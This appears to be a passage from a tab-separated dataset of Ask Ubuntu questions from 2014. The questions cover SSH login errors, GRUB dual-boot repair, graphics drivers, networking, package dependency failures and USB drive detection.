extended input device `` imexps/2 generic explorer mouse '' ( type : mouse , id 12 ) [ 122.641 ] ( ii ) config/udev : adding input device imexps/2 generic explorer mouse ( /dev/input/mouse0 ) [ 122.641 ] ( ii ) no input driver specified , ignoring this device .
484835	ssh - > permission denied ( publickey , password ) error ubuntu 12.04	problem : when ssh from machine a to machine b and vice versa i get a permission denied ( publickey , password ) . machine configurations machine a : ubuntu 12.04 , ip address 192.168.1.100 machine b : angstrom ( bbb ) , ip address 192.168.1.101 router : linksys wrt54g , ip address 192.168.1.1 note : i am new configuring ssh , and i have read a few post but i have not found any solutions what has been tried so far : uncommented rsaauthentication yes , passwordauthentication yes , port 22 in ssh_config ping machine a from machine b and vice versa port forwarding on linksys wrt54g , start to end 22 for both 192.168.1.100/101 nmap 192.168.1.1/24 starting nmap 5.21 ( http : //nmap.org ) at 2014-06-17 22:25 edt nmap scan report for 192.168.1.1 host is up ( 0.027s latency ) . not shown : 998 closed ports port state service 80/tcp open http 5431/tcp open park-agent nmap scan report for 192.168.1.100 host is up ( 0.000028s latency ) . not shown : 999 closed ports port state service 22/tcp open ssh nmap scan report for 192.168.1.101 host is up ( 0.0019s latency ) . not shown : 997 closed ports port state service 22/tcp open ssh 80/tcp open http 3000/tcp open ppp ssh -v 192.168.1.101 userid @ jets : ~ $ ssh -v 192.168.1.101 openssh_5.9p1 debian-5ubuntu1.4 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to 192.168.1.101 [ 192.168.1.101 ] port 22. debug1 : connection established . debug1 : identity file /home/userid/.ssh/id_rsa type -1 debug1 : identity file /home/userid/.ssh/id_rsa-cert type -1 debug1 : identity file /home/userid/.ssh/id_dsa type -1 debug1 : identity file /home/userid/.ssh/id_dsa-cert type -1 debug1 : identity file /home/userid/.ssh/id_ecdsa type -1 debug1 : identity file /home/userid/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version dropbear_2012.55 debug1 : no match : dropbear_2012.55 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.4 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kexdh_init debug1 : expecting ssh2_msg_kexdh_reply debug1 : server host key : rsa debug1 : host '192.168.1.101 ' is known and matches the rsa host key . debug1 : found key in /home/userid/.ssh/known_hosts:1 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : trying private key : /home/userid/.ssh/id_rsa debug1 : trying private key : /home/userid/.ssh/id_dsa debug1 : trying private key : /home/userid/.ssh/id_ecdsa debug1 : next authentication method : password this issue might be with ssh authentication , not sure where look for the solution thank you for your help in advance update : i found the solution at how to use ssh . had to use ssh ssh remote_username @ remote_host .
484838	what are all the parameters for iso-scan ?	i am trying to use a `` boot from iso '' method on a windows computer . the iso file is on a small ext4 partition on /dev/sda3 . /dev/sda [ 12 ] are ntfs . the normal iso-scan/filename fails ( /dev/sda1 ca n't be mounted because of hibernation issues due to the freeze software we are using ) . i suspect that iso-scan has other parameters than /filename ( maybe /device or /path ) with which i can direct the scan . does anyone know these extra parameters ? they do n't seem to be documented in any place that i can find .
484840	corrupted graphics on kubuntu 14.04 under vmware	after updating my kubuntu 13.10 vm to 14.04 , there is some graphics corruption . the image seems to repeat horizontally every 800 pixels : i have tried : using a different guest resolution disabling `` accelerate 3d graphics '' in the vm settings disabling desktop effects in the guest rebooting the host updating the host 's graphics drivers
484841	is there a way to suppress the bongo drum sound at boot time ?	it 's very loud and wakes people up . i 'm running ubuntu 14.04 lts .
484845	how to download ubuntu 12.04 ( .4 )	i lost my ubuntu 12.04 from my notebook . how to get/download ubuntu 12.04 ? my notebook driver ( dell insp 14 3442 ) is just compatible with ubuntu 12.04 . i have searched in http : //www.ubuntu.com/download/desktop , but only ubuntu 14.04 is listed
484846	networking not working fresh install ubuntu server 14.04	i just installed a fresh version of ubuntu server 14.04 ... . the installer was able to connect and download from the internet just fine and then when it rebooted it waited a while for the network connection but then booted without it . ifconfig was telling me that only the loopback interface was working i checked the names of my interfaces and linux was giving my ethernet configuration the name em1 instead of eth0 i changed my /etc/network/interfaces file to say em1 instead of eth0 and now i can connect to the local network for ssh but ping is failing and i ca n't use apt-get is this something related to 14.04 ? can i make this work or should i download an older version of ubuntu server ?
484847	i lost my user and my home	yesterday i started ubuntu and when i put in my password at the login screen it said `` password incorrect '' . i ran the ubuntu check disk utility and an error said `` 2 problems press any key to restart '' . how i can restore ubuntu ? i tried reset my password because i think that maybe i lost my password but it did not work . when i tried to restore my password an error said `` that user does n't exist '' , or something like that . if i start ubuntu in live mode i can see my home in : 743 gb volume/home/quethzel and my files are here , but i ca n't access it/them ?
484855	how do i get to installing a program when it says `` to install this prgram you must first remove gli binding for the gtk +tookit2.12 libgtk2.0-uil ''	i 'm trying to install qtqr , but i get a message that says : to install qtqr , these items must be removed gli binding for gtk + toolkit2.12 libgtk2.0-cil how do i remove this item using the software center ?
484858	login issue - mbp 11,1 ( 14.04 )	i forgot to plug in my charger and left my laptop running . the battery died through the night and when i booted up the computer this morning i get to the login screen ok . when i enter in login credentials and hit ok it just loads the purple ubuntu screen but does not go through to the desktop . i tried to load all of the different desktop environments i had installed and they all give me the same result . any ideas how i can fix this issue ?
484862	wpa key not authenticating	i keep entering in my wpa key correctly , even checked it on my router and it still wont let me in . i am currently hardwired into my router and able to get a connection . i am using version 14.04 .
484863	gstreamer bad plugin of file .dep are not allowing me to install any software	for any install in ubuntu it is giving the same error . how can i remove all these gstreamer package errors ? the error is installarchives ( ) failed : dpkg : dependency problems prevent configuration of gstreamer0.10-plugins-bad : gstreamer0.10-plugins-bad depends on libdirectfb-1.2-0 ; however : package libdirectfb-1.2-0 is not installed . gstreamer0.10-plugins-bad depends on libiptcdata0 ; however : package libiptcdata0 is not installed . gstreamer0.10-plugins-bad depends on libjack0 ( > = 0.118+svn3796 ) ; however : package libjack0 is not installed . gstreamer0.10-plugins-bad depends on libmodplug0c2 ( > = 1:0.7-4.1 ) ; however : package libmodplug0c2 is not installed . gstreamer0.10-plugins-bad depends on libmpcdec3 ; however : package libmpcdec3 is not installed . gstreamer0.10-plugins-bad depends on libmusicbrainz4c2a ( > = 2.1.5 ) ; however : package libmusicbrainz4c2a is not installed . gstreamer0.10-plugins-bad depends on libsoundtouch1c2 ( > = 1.3.1 ) ; however : package libsoundtouch1c2 is not installed . gstreamer0.10-plugins-bad depends on libssl0.9.8 ( > = 0.9.8k-1 ) ; however : package libssl0.9.8 is not installed . gstreamer0.10-plugins-bad depends on libwildmidi0 ; however : package libwildmidi0 is not installed . libgstreamer-plugins-bad0.10-0 ( 0.10.22.3-2ubuntu2.2 ) breaks gstreamer0.10-plugins-bad ( < < 0.10.22.3-2 ) and is installed . version of gstreamer0.10-plugins-bad to be configured is 0.10.18-1ubuntu1 . gstreamer0.10-plugins-good ( 0.10.31-1ubuntu1.2 ) breaks gstreamer0.10-plugins-bad ( < < 0.10.21.2 ) and is installed . version of gstreamer0.10-plugins-bad to be configured is 0.10.18-1ubuntu1 . dpkg : error processing gstreamer0.10-plugins-bad ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : gstreamer0.10-plugins-bad error in function :
484868	is there any hope of choosing peacefully between unity and kde at login time ( or session restart time ) ?	i am almost new to ubuntu 14.04 ( 64 bits , in my case ) so i only know the unity interface and a bit of gnome from previous ubuntu experience . as the new version of kde looked promising , i installed kde-desktop thinking i would automatically get whatever display manager allowing me to choose between kde and unity at boot time . unfortunately no display manager ever showed up ( nor even by clicking on the small icon supposed to do that at login time , which looked dead ) and i seemed to be stuck on kde ( very nice , but totally unfamiliar to me , so while i am learning to tune kde , i just have to go on with my normal work for at least some months with unity ) . reinstalling ubuntu-desktop made things even worse : automatic login gives me a black screen . of coures , i can still kill the server from a text console and issue a startx , from whick i seem to get gnome , but not unity : - ( does somebody know if my system is now hopelessly messed up ? i have a lot of things which were installed on my system ( 64 gb on my / ssd , /home is elsewhere ) ? also is there something somewhere explaining how to make unity and kde coexist on the system and be chosen at session start time , at least until i know them both enough to be able to make an enlightened choice ? i remember it was possible with some former versions of ubuntu , though kde did not seem easy enough to master at the time . any kdm , lightdm or gdm guru here ? ( i tried to reconfigure them and choose one different each time , without any more success ) . by the way , i had an autologin previously and did not know how to remove it . might that be part of the problem ? thanks to whoever has or may have a clue . there is clearly something i am not grasping clearly : -/
484870	`` basic ubuntu server '' in taksel	i have ubuntu server installed what will be removed if i used tasksel to uninstall `` basic ubuntu server '' task ? what are the features going to be removed thank you
484873	is dnsmasq preventing internet ?	on my computer i have dual boot win 7 and xubuntu 14.04 64-bit . tonight i switched over to xubuntu to work on something . when i fired up firefox it acted like i did n't have an internet connection . dropbox would n't connect either , however spotify would play . i am hardwired to my router . i checked ufw and found a whole slew of ports that said were being used by dnsmaq . i was doing some port forwarding yesterday and these ports with dnsmasq were not there . i fired up my laptop which is connected via wireless thinking maybe i could use it to look for a solution online . it showed the same behavior . web browsers acted like there was n't an internet connection , software updater would n't download packages . it said to check my internet connection . i turned on my wireless hotspot on my phone and connected both computers to it . connected to my phone i have internet access again . i ca n't figure out what dnsmasq is doing or if it is conflicting with something . the only thing i can think of is that i configured network manager and my router to use opendns servers . could there be a conflict with that ? when i 'm running under win 7 i have full internet access .
484874	auto restart bitcoin mining service	i am running a service on my vps which needs to restart . currently i am having a hard time keeping it going so i need to create something that will restart this task . screen -s rie ./xptminer -o http : //ypool.net -u -p -t 4
484878	installation problem : unity ubuntu-desktop	currently i am using gnome-shell but now i want to use unity desktop . i tried to install ubuntu-desktop by following command sudo apt-get install ubuntu-desktop its showing following error the following packages have unmet dependencies : ubuntu-desktop : depends : ubuntu-session but it is not going to be installed depends : unity-control-center but it is not going to be installed depends : unity-settings-daemon but it is not going to be installed recommends : xul-ext-webaccounts but it is not going to be installed e : unable to correct problems , you have held broken packages .
484879	problem : when update my system ( in directory ) .	when i type sudo apt-get update in terminal that shows error like this e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what should i do ?
484880	dual boot option not displaying	i have installed ubuntu 14.04 in a machine and worked fine , it had the 160gb hard disk and i have partitioned as / 30gb swap 2gb /home 100gb unpartition space for windows 26gb i have installed ubuntu and it 's worked fine i want to install windows 7 , so what i did is installed win7 in 26gb of unparitioned space , after reboot its not showing the operating system chooise menu , as ubuntu , ms-dos its not showing it , when ever i on the system it 's straightly boots into windows7 so what i did is rebuild the grub by following step's boot from ubuntu installation cd and choosed try ubuntu , while in this live cd environment , in terminal sysadmin @ sysadmin-java-devel : ~ $ sudo fdisk -l [ sudo ] password for sysadmin : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b235e device boot start end blocks id system /dev/sda1 2048 3999743 1998848 82 linux swap / solaris /dev/sda2 4001790 257904639 126951425 5 extended /dev/sda3 * 257904640 258109439 102400 7 hpfs/ntfs/exfat /dev/sda4 258109440 312578047 27234304 7 hpfs/ntfs/exfat /dev/sda5 4001792 62593023 29295616 83 linux /dev/sda6 62595072 257904639 97654784 83 linux here my / partition is sda5 , i do n't have a separate /boot parition , so i did sudo mount /dev/sda5 /mnt sudo rm -rf /boot sudo ln -s /mnt/boot /boot then restarted the system using sudo init 6 it 's rebooted and while the grub its shows as file not found press any key to continue if i press any key its booting into ubuntu desktop and it 's worked , now i ca n't access windows 7 , i want both windows 7 and ubuntu . but i now want the dual boot operating system choosing menu , how can i use the windows which i have installed and already its in /dev/sda4 . any one there to help me out .
484882	can not install ati radeon mobility 5470 lates driver	i installed kubuntu 14.04 ( 64bit ) on a laptop with ati radeon mobility 5470 graphic card . trying to install latest proprietary driver ( version 14.4 ) installer says your card is not supported by this driver : ati says this driver supports ati mobility radeonâ˘ hd 5000 series . however supported operating systems are : red hat enterprise linux suite 6.4 and 6.5 suseâž linux enterprise 11 sp3 opensuse 13.1 ubuntu 12.04.3 , 12.04.4 and 13.10 so the last line this means that catalyst 14.4 is not supposed to work with ubuntu 14.04 ? if so , what should i do now ? ( fglrx or xorg-xserver-ati is not an option )
484885	wifi access using linksys ae1200	first of all you will have to excuse me - my linux skills are very basic . i have recently installed lubuntu 14.04 and have been very happy with everything until i moved the pc ( dell optiplex 755 - ye olde faithfull ) to my man cave . this man cave has no access to a wired connection . there was me thinking i would easily be able to connect my linksys ae1200 usb dongle in and off we go how wrong have i been ! ! ! i would consider myself technical ( work in it ) but this has taken the biscuit ! ! steps so far - installed ndiswrapper installed xp driver from the linksys site ( bcmwlhigh5 driver ) then had to setup the usb dongle to start up on bootup by starting nm-applet in startup app ( default applications for lxsession now the usb dongle connects to the internet on bootup however after attempting to download a torrent my torrent client ( deluge ) crashes and subsequently i can not access firefox . please help ! i really need this to work otherwise i might have to go back to windoze ! ! ! thanks .
484887	show only svn in rabbitvcs context menu	after install of rabbitvcs i get git , svn and hg integration in nautilus . how to remove hg and git from context menu ?
484891	problem : unicode data corrupted from ascii program	i was using html2text program to extract unicode devanagari from html file . but it is giving output as , '' à¤¶à¥à¤°à¤¦à¥à¤§à¤§à¤¾à¤¨à¤¾à¤¨à¤¾à¤ '' . in windows i would rectify this by using convert to unicode feature in notepad++ . what to do for ubuntu ? update : for testing purpose i am adding this : echo आचार्यपूज्यपादानामिष्टं | html2text renders à¤à¤à¤¾à¤°à¥à¤¯à¤ªà¥à¤à¥à¤¯à¤ªà¤¾à¤¦à¤¾à¤¨à¤¾à¤®à¤¿à¤·à¥à¤à¤
484894	dual monitor/projector login screen	if have a dual `` monitor '' setup , where one of the monitors actually is a projector . the projector is not always turned on . the problem is , that the login screen quite often is not visible and the rather unexperienced users do not know how to login then . yes , you would just have to move the mouse to the left or right and then the login screen appears . anyway , is there a way to change the login screen to clone mode , which actually works well after login ? thanks thomas
484895	not able to get grub boot menu dual boot ubuntu wndows 8	i 'm using sony vaio svf series with windows 8.1 preinstalled . recently i installed ubuntu 14.04 as dual boot through the following link . https : //help.ubuntu.com/community/uefi after installation i got the boot menu and was able to login to ubuntu . but once i logged in to windows then i am not getting the boot menu . instead each time it goes directly to windows 8 . what should i do to fix this problem ? i ran boot repair . http : //paste.ubuntu.com/7653805/ thanks in advance
484900	problem with chromium	i have a problem with ubuntu 14.04 and google chromium , ( details : version 34.0.1847.116 ubuntu 14.04 aura ( 260972 ) ) . chromium was working fine up to a recent install of updates from ubuntu and now it wo n't open a browser at all , other than with a temporary profile when it seems to work ok . i thought that chromium had somehow got corrupted and uninstalled it , losing all my history and bookmarks in the process , and reinstalled thinking that the problem would be solved but to no avail . firefox on the other hand works just fine . can anyone point me in the direction of a solution ?
484901	rtc wakealarm could not work	ubuntu precise with 3.15 kernel ( from kernel.ubuntu.com ) . rtc seems fine : % cat /proc/driver/rtc 14-06-18 - 15:05:39 rtc_time : 07:06:18 rtc_date : 2014-06-18 alrm_time : 07:08:41 alrm_date : 2014-06-18 alarm_irq : no alrm_pending : no update irq enabled : no periodic irq enabled : no periodic irq frequency : 1024 max user irq frequency : 64 24hr : yes periodic_irq : no update_irq : no hpet_emulated : yes bcd : yes dst_enable : no periodic_freq : 1024 batt_status : okay` and % cat /sys/class/rtc/rtc0/device/power/wakeup 14-06-18 - 15:06:18 enabled but # echo 0 > /sys/class/rtc/rtc0/wakealarm # cat /sys/class/rtc/rtc0/wakealarm #
484903	messed up after installing unity8/unity mir	i recently installed unity 8/unity mir desktop from terminal using command provided on omg ubuntu . but now i ca n't go back to my original unity desktop . my pc is on auto login at start-up so i ca n't change my desktop from login screen : ( i ca n't logout , restart , shutdown or open terminal : ( any suggestions ?
484911	wine will not start after upgrading to ubuntu 14.04	on ubuntu 12.04 , wine was working fine ... then , i upgraded to ubuntu 14.04 . now , when i start wine it says : `` error while loading application settings . wine 's library path for 32 and 64 bit is not set . please , go to the q4wine options dialog and set at least one path . '' how do i set this path ?
484914	network access impossible using bridge mode	i installed ubuntu 12.04 lts as a vm on virtualbox . i activated only the first adapter to use the bridge mode . once logged into ubuntu , i can not ping 8.8.8.8 with the nat mode , i access internet ( without any additional configurations ) , but with the bridge mode i always stuck on this problem.how can i allow internet access to my vm using the bridge mode ? i do not know which information needed to display here to resolve this problem . you are welcome to ask me that .
484917	problem in vmware installation ( 12.04 lts )	i had problem when installing ubuntu 12.04 lts on vmware , after install and require a restart when booting directly appear display terminal and not unity environment : ( there that know ? ********************************************* ********************************************* vmware easy install > please wait ! vmware tools is currently being installed on your system . depending on the version of ubuntu you are installing , you may log in below and use the system during the installation . otherwise , please wait for the graphical environment to launch . thank you ********************************************* ********************************************* ubuntu login :
484918	phpstorm theme installation folder not found	i am new to ubuntu and i am trying to install theme for phpstorm . this question point out the folder ~/.webide50/config/colors but i am unable to find ~/.webide50 folder .
484921	php5-imap on ubunut 14.04 is not enabled	after apt-get install php5-imap i still have to manually do php5enmod imap which seems odd and inconsistent . is there any particular reason for this ?
484928	how to make a iso image from a bootable dvd in windows ?	i am using windows 7 . and i want to install ubuntu 12.04 to my new notebook pc . it has no dvd-rom so i wan na make *.iso file so i can install it fom a usb . i have the ubuntu 12.04 bootable dvd . how to make those files in the dvd a iso image ?
484929	flashdrive shows up twice in disk utility and one is listed as a 1.4 terabyte cd drive	i have an old 2 gig thumbdrive , and one day i decided to use it to backup my data . i 'm using ubuntu 12.04 desktop . i setup back in time to backup to it , but it failed . i tried again , and this time the log said : [ e ] ca n't remove folder : /media/f40e-deea/kanon/backintime/kanon-vostro-1500/kanon/3/new_snapshot [ e ] failed to take snapshot 06/18/2014 00:56:49 ! ! ! i tried to delete the folder manually in nautilus , but `` move to trash '' is grayed out . hitting the delete key did nothing . investigating , i ran disk utility and found : http : //i.imgur.com/ibbqn9r.png http : //i.imgur.com/zssumex.png ( sorry , i do n't have the reputation to post images yet . ) what the heck is going on ?
484930	how do i check services requiring a restart ( of services , not the machine ) by installing updates to other packages	if i run sudo apt-get upgrade then i get shown a list of packages and if any of these are services , they may need to be restarted ( which is done automatically when installing the updates ) . how can i tell if one of these packages will require a restart of a service , for example if i update a package which is not named mysql* then i 'd like to know before i install the updates that this might trigger a restart of the mysql service ( if the package is named mysql* i 'll assume a restart to service is required ) . or does this never happen ? if a restart of the mysql service is required , i 'll remove that node from the load balancer pools and let all connections to it finish before installing the updates . just to clarify , i 'm referring to restarting of services , not rebooting the whole machine . thanks for your help .
484938	how can i affect the whole screen ?	some background : i sometimes have things that i need to do at regular intervals ( e.g . every half hour ) or schedule for a time in the future , and i need some way to alert me . i find that small alarms ( e.g . taskbar alerts ) i do n't notice , and big popups ( e.g . xmessage ) are annoying , because i have to immediately respond to them - i ca n't take the time to finish typing the current line , because they 've taken the focus . also : i ca n't use a sound alert for business reasons . so i 'm looking for something that is big enough to affect the whole screen , impossible to miss , but that does n't interrupt me . for instance , if i could have the whole screen slide an inch to one side and then snap back - there 's no way i could miss it , but it wo n't stop me typing . is there any way to manipulate the entire display , as a whole ? i assume ubuntu has some sort of graphic-driver-management tools somewhere , how can i access them from the command line ( so i can use cron ) ?
484943	hp pavilion 17-e073ed fails loading ubuntu 14.04 due to graphic card	i have tried to install ubuntu 14.04 on my hp pavilion 17-e073ed . the installation went fine , but at the moment of the reboot , ubuntu fails due to problem on graphic cards . a message appears saying that the graphic inputs can not be configured because i had to do manually . after a second message appears letting me to choose to start in reduced modality or to configure the graphic card . the first option produces just a black screen and the second does not work . please let me know if you had the same problem and hod did you solve it thanks
484944	network settings on ubuntu 12.04	i installed ubuntu 12.04 lts as a vm with the bridged mode . the host is windows . i set these configurations to their right values : auto eth0 iface eth0 inet static address 10.1.16.66 netmask 255.255.255.0 broadcast 10.1.16.255 dns - nameserver 8.8.8.8 gateway 10.1.16.254 i also did the right settings for /etc/resolv.conf and /etc/hosts files i run ping 8.8.8.8 but it fails . however , my host machine uses only wifi . must i rename eth0 to wlan0 ? if yes , then why when i run sudo ifconfig wlan0 up it displays me : `` wlan0 : error while getting interface flags : no such device '' ? note : the same settings work on my other pc connected to internet using cable . host settings ( windows 7 ) : ip address : 10.1.16.67 dns nameserver : 8.8.8.8 netmask 255.255.255.0 default gateway : 10.1.16.254 vm settings ( ubuntu 12.04 lts , on a virtualbox -last version )
484948	unity stopped working . blank desktop	i was having problems installing mongodb with npm and i found someone saying that the problem is related to the fact that i had python 2 and 3 installed . so i removed python 3 and after this many ubuntu apps disappeared . after rebooting , unity stopped working and i ca n't open terminal , view my apps , etc . i 've reinstalled unity and also tried to install gnome , but it still does n't work . what do i have to do ?
484951	maas region controller and cluster controller with nodes	i 've realized an infrastructure like this : kvm as hypervisor and 3 vm : 1 vm for region controller ( rc ) 2 vm for cluster controller ( cc ) , each one with 2 or more nodes installed and manage via virtio each vm use different virtual network 2.2.2.0/24 ( rc ) ,3.3.3.0/24 ( cc ) 'n 4.4.4.0/24 ( cc ) configured on virsh-manager , i 've also added and accepted 2 cc on rc . but in the rc 's web ui i see only 2 cc without the nodes associated on them . a question : but which is the region 's goal ? sees just the cc and not manage the nodes ? thanks a lot
484952	vokoscreen area recording problem	i 'm having problems trying to make area recordings with vokoscreen 2.0.0-2 in ubuntu 14.04 , the center marker is showing in the video . is there any way to make area recordings without this center marker appears in the video ! ? below is a capture from a video with the problem :
484953	error while installing printer in kubuntu 14.04	i 'm using kubuntu 14.04 i have tried to install a canon printer mp6250 but unfortunately i get this failed to get a list of devices : 'invalid argument'
484954	error occured when updating system	i have a problem during updating my ubuntu system using terminal . recently , there was two warning message appears on my terminal which like below : w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/trusty-getdeb/apps/binary-i386/packages 521 origin down [ ip : 141.101.116.236 80 ] and w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/trusty-getdeb/games/binary-i386/packages 521 origin down [ ip : 141.101.116.236 80 ] i do n't know how could this happen . i thought , maybe it was from my wi-fi connection but it 's not . and i 've tried to update again my system using my terminal and that problem is still appear . so , i hope if you guys can tell me what and why the warning messages appear . and i hope will get solution from anyone .
484956	why is hostname resolution different with root/sudo ?	if give my nat ip a hostname in /etc/hosts # ... 192.168.20.20 myname-local.de then ping myname-local.de is successful , but sudo ping myname-local.de says unknown host ? why is that ? and how do i make root care for my hostnames in /etc/hosts ?
484957	how to restore wine windows after alt+tab to show desktop	i 'm using a program via wine and everything works great . but every time press alt+tab and select `` show desktop '' i can not maximize my wine application again . if i press alt+tab again and select my wine application nothing happens . i can select right-mouse button in launcher e select `` quit '' but it 's very annoying . what can i do to solution this ?
484958	problem in boot up ( 14.04 ) ; asking passphrase	a very basic question i 'm afraid , but i did not do the installation of 14.04 , and when i boot up i am asked for a passphrase ( sda5_crypt ) , does this mean my disk is encrypted , and if so what are the consequences for recovering data in the event of problems .
484961	initctl : unknown job : mysql ubuntu 12.04.4	i just updated my ubuntu and mysql service wont start up . i 've tried to re-install million time , i still get this error message : initctl : unknown job : mysql the error log shows this : error : 1064 you have an error in your sql syntax ; check the manual that corresponds to your mysql server version for the right syntax to use near 'alter table user add column show_view_priv enum ( 'n ' , 'y ' ) character set utf8 not ' at line 1 140618 17:45:21 [ error ] aborting mysql folders are created and i 'm using root access to install mysql server . /etc/init.d/mysql is there . but why am i getting unknown job ? i try this service mysql start and /etc/init.d/mysql start . while i was installing mysql-server5.5 setting up mysql-server-5.5 ( 5.5.37-0ubuntu0.12.04.1 ) ... initctl : unknown job : mysql
484963	lubuntu installed on 50 laptops	i am refurbishing laptops for 2 schools in nepal and i will be setting up at least 50 laptops with lubuntu 14.04 with educational software . what is the most efficient way of replicating the same os with applications on many different laptops ?
484965	i want to get current path when i open terminal in current folder in unity	i have installed the nautilus-open-terminal , so i have `` open in terminal '' line in the context menu , but in terminal is always path to the home folder . i want it to be like in kde : in some folder > right click > open terminal here , and you got terminal with path into current folder .
484966	no irq handler for vector	i want to use my old pc : asus psvd2-mx , intel e6300 ( first version named that ) , nvidia 8600 gt , 3 sata hdd + 1 ide hdd + 1 ide dvd-drive . when i 've started ubuntu from live cd i got message `` .179 no irq handler for vector ( irq -1 ) '' and nothing more appears . years ago , there was ubuntu 10.10 installed , it was fine . i already checked , for most irq handler messages is enough to run boot with `` pci=nomsi , noaer '' options . my questions are : is my pc broken ? maybe it really is an issue and i must to change mainboard ? - that is already answered - i successfully installed windows 8.1 and everything seems working fine . eventually , how to overcome that error and install any linux ? i already tried mint and elder lubuntu , but the same error every time . - i got impression that since 3.0 version of kernel irq handler warnings are considered errors . earlier versions of kernel only printed warnings , other things were ok . probably those questions deserve my work more then simply answer , so my last question : how to run installation of ubuntu with `` pci=nomsi , noaer '' options ?
484969	problem in system update ; failed install and removal of software packages	i can not install and uninstall software i used these comments : sudo dpkg -- configure -a sudo apt-get clean sudo apt-get update sudo apt-get update sudo dpkg-reconfigure -a what shall i do ? pictures of my errors :
484970	grub rescue prompt after mac osx update	last night i updated osx on the mac i dual boot with ubuntu ( i 'm unsure of the version , but if it helps i installed it nov 2013 ) when i try to boot ubuntu i get thrown into the grub rescue prompt . i 'm trying to make sure i understand what 's going on . based on what i 've read , it sounds like the osx update whacked some part of the boot partition that allows access to the ubuntu installation . is that correct ? all the data in the linux partition should still be there - is that correct ? google fu has turned up the following resources explaining how to repair my grub installation : grub rescue prompt megathread - drs305 http : //ubuntuforums.org/showthread.php ? t=1594052 howto : boot & install ubuntu from the grub rescue prompt http : //ubuntuforums.org/showthread.php ? t=1599293 are these current enough for me to use ? will the instructions allow me to permanently correct the problem ? does anyone have any suggestions for avoiding it in the future ? first problem : i have located my boot partition on ( hd1 , gpt5 ) and am trying to execute the command `` linux /vmlinuz root=/dev/sdxy ro '' but am unsure what values to use for x and y. in the previous steps in the docs x and y have referred to ( hd1 , gpt5 ) but using them literally - /dev/sd ( hd1 , gpt5 ) - fails . does hd1 , gpt5 indicate i am on /dev/sdb5 ? thanks mark
484976	usb drive not recognized ubuntu 14.04	i have a 16gb hama usb stick and i 'm using it on ubuntu 14.04 . until yesterday it worked fine , but my linux crashed and i had to copy some files on it using the low graphics interface . anyways the files where copied and i reinstalled the system , but now i do n't see my drive . any other drives work . this is what i get with dmesg | grep -i usb [ 3028.034004 ] usb 2-1.6 : reset high-speed usb device number 6 using ehci-pci [ 3038.195532 ] usb 2-1.6 : reset high-speed usb device number 6 using ehci-pci [ 3054.355731 ] usb 2-1.6 : reset high-speed usb device number 6 using ehci-pci [ 3054.523730 ] usb 2-1.6 : reset high-speed usb device number 6 using ehci-pci [ 3064.685451 ] usb 2-1.6 : reset high-speed usb device number 6 using ehci-pci [ 3522.645454 ] usb 2-1.6 : usb disconnect , device number 6 [ 3542.867682 ] usb 2-1.6 : new high-speed usb device number 7 using ehci-pci [ 3542.960989 ] usb 2-1.6 : new usb device found , idvendor=058f , idproduct=6366 [ 3542.960994 ] usb 2-1.6 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 3542.960998 ] usb 2-1.6 : product : flash card reader/writer [ 3542.961000 ] usb 2-1.6 : manufacturer : generic [ 3542.961002 ] usb 2-1.6 : serialnumber : 058f63666438 [ 3542.961388 ] usb-storage 2-1.6:1.0 : usb mass storage device detected [ 3542.962447 ] scsi10 : usb-storage 2-1.6:1.0 [ 3574.943893 ] usb 2-1.6 : reset high-speed usb device number 7 using ehci-pci [ 3585.105482 ] usb 2-1.6 : reset high-speed usb device number 7 using ehci-pci [ 3601.265555 ] usb 2-1.6 : reset high-speed usb device number 7 using ehci-pci [ 3601.433364 ] usb 2-1.6 : reset high-speed usb device number 7 using ehci-pci [ 3611.594898 ] usb 2-1.6 : reset high-speed usb device number 7 using ehci-pci this is what i get with lsusb bus 002 device 007 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0461:4d51 primax electronics , ltd 0y357c pmx-mmoczul ( b ) [ dell laser mouse ] bus 001 device 005 : id 413c:2110 dell computer corp . bus 001 device 003 : id 413c:1010 dell computer corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub and this is what i get with lsblk name maj : min rm size ro type mountpoint sda 8:0 0 232.9g 0 disk ├─sda1 8:1 0 229g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 3.9g 0 part [ swap ] result for sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00042ebd device boot start end blocks id system /dev/sda1 * 2048 480237567 240117760 83 linux /dev/sda2 480239614 488396799 4078593 5 extended /dev/sda5 480239616 488396799 4078592 82 linux swap / solaris do you have any ideea what is happening to my drive ?
